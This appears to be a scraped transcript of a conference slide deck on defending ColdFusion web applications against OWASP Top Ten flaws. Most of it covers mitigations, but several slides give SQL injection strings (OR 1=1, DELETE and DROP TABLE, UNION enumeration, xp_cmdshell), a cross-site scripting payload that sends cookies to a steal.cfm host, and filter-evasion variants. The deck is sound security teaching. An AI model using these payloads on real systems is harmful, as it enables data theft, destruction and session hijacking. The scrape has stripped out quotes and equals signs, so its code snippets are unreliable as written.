Web Application Security: Practicing Defense InDepth - PowerPoint PPT Presentation

1 / 44
About This Presentation
Title:

Web Application Security: Practicing Defense InDepth

Description:

Write a UDF to escape special characters in content that may be used for XSS ... the user by logging server-side and providing a unique ID to reference the error ... – PowerPoint PPT presentation

Number of Views:178
Avg rating:3.0/5.0
Slides: 45
Provided by: tri5595
Category:

less

Transcript and Presenter's Notes

Title: Web Application Security: Practicing Defense InDepth


1
Web Application Security Practicing Defense
In-Depth
  • Dean H. Saxe
  • dean_at_fullfrontalnerdity.com

2
Tonights Presentation
  • What will be covered
  • OWASP Top Ten
  • Defense In Depth - The Onion Model
  • Penetration testing
  • Web App Firewalls
  • Web Application Vulnerability Scanners
  • Tools
  • Resources

3
Security Misconceptions
  • The Firewall protects my web server and database
  • Access to the server through ports 80 and 443
    makes the web server part of your external
    perimeter defenses
  • Vulnerabilities in the web server software or web
    applications may allow access to internal network
    resources

4
Security Misconceptions
  • The IDS protects my web server and database
  • The IDS is configured to detect signatures of
    various well-known attacks
  • Attack signatures do not include those for
    attacks against custom applications

5
Security Misconceptions
  • SSL secures my site
  • SSL secures the transport of data between the web
    server and the users browser
  • SSL does not protect against attacks against the
    server and applications
  • SSL is the hackers best friend due to the false
    sense of security

6
Open Web Application Security Project
  • http//www.owasp.org
  • OWASP Top Ten Vulnerabilities
  • OWASP Guide
  • OWASP Testing Guide
  • WebGoat
  • And much more to come

7
Web Applications First Line of Defense?
  • Requests can be sent from around the world
  • Jon Postel on TCP/IP
  • Be liberal in what you accept and conservative
    in what you send
  • Not all HTTP requests are valid but are often
    accepted by the web server
  • Many webapps are liberal in what they accept
    (poor validation) resulting in undesirable
    behaviors

8
SQL Injection I
  • SQL Injection is a command injection attack
    caused by unvalidated input and string-building
    to craft DB queries
  • Attacker sends specially crafted data to the
    application in order to modify the queries being
    sent to the DB

9
SQL Injection II
  • SELECT
  • FROM accounts
  • WHERE acct_id URL.acct_id

10
SQL Injection III
  • GET /view_account.cfm?acct_id28 HTTP/1.1
  • SELECT
  • FROM accounts
  • WHERE acct_id 28

11
SQL Injection IV
  • GET /view_account.cfm?acct_id28 OR 11 HTTP/1.1
  • SELECT
  • FROM accounts
  • WHERE acct_id 28 OR 11

12
SQL Injection V
  • SELECT
  • FROM users
  • WHERE username URL.lastname

13
SQL Injection VI
  • GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
  • SELECT
  • FROM users
  • WHERE lastname OMalley

14
SQL Injection VII
  • ltcfset URL.lastname URL.lastnamegt
  • SELECT
  • FROM users
  • WHERE username preserveSingleQuotes(URL.lastnam
    e)
  • GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
  • SELECT
  • FROM users
  • WHERE lastname OMalley

15
SQL Injection VIII
  • GET /user_lookup.cfm? lastnamefooDELETE FROM
    users WHERE 11 HTTP/1.1
  • SELECT
  • FROM users
  • WHERE lastname fooDELETE FROM users WHERE
    11

16
SQL Injection IX
  • CF 5 bug prevents escaping of single quotes in
    queries when the variable being evaluated uses
    array syntax.
  • SELECT
  • FROM users
  • WHERE username URLlastname
  • GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
  • SELECT
  • FROM users
  • WHERE lastname OMalley

17
SQL Injection Useful Injection Strings
  • acct_id28 OR 1 1
  • Try various OR clauses using ltgt, gt, gt, LIKE,
    etc.
  • Use comments to end a statement prematurely
  • SELECT FROM users WHERE user_id 1-- AND
    passwordmypass
  • Enumerate database information
  • acct_id28 UNION SELECT name ,1,2, FROM
    sysobjects WHERE xtypeU
  • acct_id28 UNION SELECT columnames FROM table
  • UNION requires both statements to share a common
    number of columns, add columns as required

18
SQL Injection SQL Server
  • Concatenate multiple statements with semicolons
  • acct_id28 DROP TABLE Users
  • Useful Stored Procedures
  • xp_msver
  • xp_cmdshell command
  • xp_servicecontrol action service

19
SQL Injection Oracle
  • Multiple statements not allowed
  • Enumerate database
  • acct_id28 UNION SELECT username FROM all_users
  • acct_id28 UNION SELECT object_type, owner FROM
    all_objects
  • Abuse ALL_, USER_, V views

20
SQL Injection Mitigation Techniques
  • Principle of Least Privileges
  • Database should run with lowest possible system
    privileges
  • Database users should be allowed the least
    possible privileges. Disable privileges to
    stored procedures, tables, etc when not required.
  • Limit execution privileges for users to SELECT,
    UPDATE, DELETE and user stored procedures
  • Dont use sa!

21
SQL Injection Prevention
  • Parameterized queries
  • ltcfqueryparamgt
  • ltcfstoredprocparamgt
  • Cant be used with cachedwithin, cacheduntil
    attributes of ltcfquerygt
  • Data validation
  • Stored procedures

22
Cross Site Scripting (XSS)
  • Attacker injects client-side scripts (JavaScript)
    into the browser
  • Code is executed by the browser to perform some
    action
  • Major XSS methods
  • Social Engineering Entice user to click on link
    with malicious payload
  • Stored data invokes JavaScript when the user
    views a page (e.g. user forums)

23
XSS Examples
  • ltscriptgtlocation.hrefhttp//10.1.1.1/steal.cfm?c
    document.cookielt/scriptgt
  • lta hrefjavas99ript35codegt
  • ltdiv stylebehaviour url(link to code)gt
  • ltbody onloadcodegt
  • ltimg srcjavascriptcodegt
  • Attempt hex and double-Unicode encoding to
    subvert blacklists
  • And many, many more.

24
Cross Site Scripting Prevention
  • Input validation
  • Output filtering
  • htmlEditFormat()
  • Replaces lt, gt, , with their entity values
  • extendedHtmlEditFormat()
  • Write a UDF to escape special characters in
    content that may be used for XSS
  • Replace lt, gt, , , (, ), with their entity
    values
  • Wrap all output with potentially dangerous
    characters in the UDF
  • Ability to quickly add new characters quickly if
    new attacks are discovered

25
Parameter Tampering
  • Modifying pre-set variables in order to subvert
    application logic
  • Change a list of states to include the option
    value
  • GADELETE FROM users WHERE 1 1
  • Modification of cookies, query strings, hidden
    fields, select boxes, check boxes, radio buttons
    and other fixed data
  • Change cookie value adminn gt adminy to elevate
    privileges
  • Index.cfm?modedebug can be used to elicit the
    debug mode of ColdFusion, potentially revealing
    template and database info.
  • ltcfsetting showdebugoutputfalsegt in
    Application.cfm will prevent debug information
    from ever being show.
  • Limiting debug output to 127.0.0.1 on production
    servers can also be used

26
Parameter Tampering Prevention
  • Data validation
  • Must be server-side, client-side validation with
    JavaScript can be subverted easily
  • Ensures data is within specified character set,
    length, etc.
  • Validate multiple pieces of information which are
    interdependent
  • Validate all data from the browser (CGI.,
    COOKIE., FORM., URL.) for content, extra
    fields, missing fields, duplicated fields
  • All validation must be complete before any
    further processing of the request. Consider
    moving validated data to a new scope
    (VALIDATED.FORM.field_name) for easy code reviews

27
Whitelist vs. Blacklist
  • Whats a blacklist?
  • Blacklists are a used for negative assertion that
    the data being analyzed is not in the blacklist
  • Whats a whitelist?
  • Whitelists are used for positive assertion that
    the data being analyzed match an item in the
    whitelist
  • Which is better and why?

28
Whitelist Is a Better Approach
  • Searching for valid data easier than invalid data
  • Attackers represent data in many different manners

29
Building a Better Validation Engine
  • Identify general data types and valid content for
    each
  • Alphabetic
  • Alphanumeric
  • Special characters
  • Numeric
  • Integer
  • Floating point
  • Comma or period delimited? Negative numbers?
  • HTML content
  • Limit accepted tags and attributes with
    whitelists for acceptable content

30
Building a Better Validation Engine II
  • Validate all data received from the users
    browser
  • Hidden form fields, check boxes, select boxes all
    require validation!
  • Use indirection rather than primary keys
  • Present user with a select box with option values
    of 1..N, referencing the ordinal position of the
    item in an array in the users state
  • Validate value is within the bounds of the array

31
Building a Better Validation Engine Indirection
  • ltselect nameacct_idgt
  • ltcfoutput querylist_accountsgt
  • ltoption valueacct_idgtacct_name
    acct_numberlt/optiongt
  • lt/cfoutputgt
  • lt/selectgt
  • ltcfset VARIABLES.acct_id_array arrayNew(1)gt
  • ltselect nameacct_idgt
  • ltcfoutput querylist_accountsgt
  • ltcfset arrayAppend(VARIABLES.acct_id_array,
    acct_id)gt
  • ltoption
  • valuearrayLen(VARIABLES.acct_id_array)gt
  • acct_nameacct_number
  • lt/optiongt
  • lt/cfoutputgt
  • lt/selectgt

32
Building a Better Validation Engine VI
  • Requirements for a better engine
  • Register form fields with their validation
    routines when creating views
  • Automatic indirection
  • Automatic server-side validation cannot be
    subverted by developer
  • Easy to scan for proper use of validation engine
  • Built-in validators for common data types
  • Additional client-side validation, too!
  • Where is this mythical product for CF?

33
Error Handling
  • Application Errors
  • Errors are an attackers best friend since they
    often reveal sensitive information
  • Hide the error from the user by logging
    server-side and providing a unique ID to
    reference the error
  • Data validation errors
  • Bad Input
  • Malicious Input

34
Encryption and Hashing
  • Encryption is used to hide data
  • Hashing is used to verify integrity of data
  • Both are generally used improperly leading to a
    false sense of security
  • Practical Cryptography by Niels Ferguson and
    Bruce Schneier

35
Web and Applications Server Misconfiguration
  • Backup files left accessible in the web root
  • Admin directories and applications exposed to the
    outside world
  • CFAdministrator
  • IIS Control Panel

36
Broken Access Controls
  • Forced Browsing
  • Malicious user can manually browse to any page on
    the server, potentially escaping access control
  • Use an architecture that allows the user to be
    tracked through the application with positive
    assertion that he has access to the page being
    requested and it is not out of sequence for the
    current process

37
Grab Bag
  • Secure cookies
  • Comments
  • Parameter Tampering via Cookie Poisoning
  • Add HMAC to cookie to prevent tampering
  • Hash(saltvalue) gt HMAC
  • Modifying hidden fields
  • Store in state data

38
Penetration Testing Your Apps
  • Man In The Middle Proxies
  • Used to trap HTTP request/response stream and
    modify data on the fly
  • Achilles
  • Paros
  • WebScarab

39
Penetration Testing Your Apps II
  • Testing Server Hardening
  • Nikto - scan for well known vulnerabilities on
    web servers
  • Nmap - Port scanner to scan the network for open
    ports
  • Netcat - Network Swiss Army knife. Useful for
    connecting to web servers or other open ports for
    banner grabbing, reconnaisance. Can be used for
    shell shovelling
  • openSSL - Open source SSL toolkit. Used to
    create SSL proxy for netcat to explore secure
    webservers

40
Penetration Testing Your Apps III
  • Web Application Vulnerability Scanners
  • Automatically walk your application, scanning for
    XSS, SQL Injection, server-level vulnerabilities
  • WebInspect
  • ScanDo
  • AppScan
  • 6-20 hit rate
  • Outsource the work
  • There is no body in charge of certifying the
    quality of the work done by various PenTest
    companies. Buyer beware!
  • ISS
  • FoundStone
  • Etc.

41
Securing Your Apps
  • Very large body of existing code needs
    remediation
  • Identify priorities
  • What can be done quickly?
  • Configuration of servers
  • Global error handling
  • Assess value of assets to be protected
  • Protect high value assets first

42
Securing Your Apps II
  • Web Application Firewalls
  • Vendors claim quick deployment to protect apps
  • Reality is not so quick, depending on size and
    complexity of app
  • Brings business logic into another application
    layer
  • Requires identifying params passed to each page,
    writing of appropriate RegEx
  • Misses parameter tampering if data matches regex

43
Resources
  • OWASP
  • SecurityFocus
  • SPIDynamics
  • FoundStone
  • www.hackingexposed.com
  • Innocent Code by Sverre H. Huseby
  • Training Courses
  • Foundstone
  • Intense Training

44
Comments/Questions?
  • Dean H. Saxe
  • dean_at_fullfrontalnerdity.com
Write a Comment
User Comments (0)
About PowerShow.com